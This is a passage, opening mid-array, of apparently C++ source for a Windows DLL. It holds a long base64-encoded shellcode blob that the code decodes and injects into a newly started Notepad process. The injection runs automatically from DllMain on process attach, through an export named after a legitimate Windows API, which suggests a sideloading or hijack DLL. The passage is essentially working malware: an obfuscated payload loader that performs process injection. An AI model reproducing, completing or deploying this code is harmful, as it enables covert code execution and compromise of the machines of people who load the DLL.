	"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",
	"JAhfwwAAAAAAAAAAAAAAAAAA"
	};
	std::string base64_encoded;
	for (const auto& chunk : chunks) {
		base64_encoded += chunk;
	}
	size_t out_size;
	unsigned char* shellcode = base64_decode(base64_encoded, out_size);
	int id = startNotepad();
	Injector::Run(id, shellcode, out_size);
	return 0;
}


BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		PSGetPropertyDescription();
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}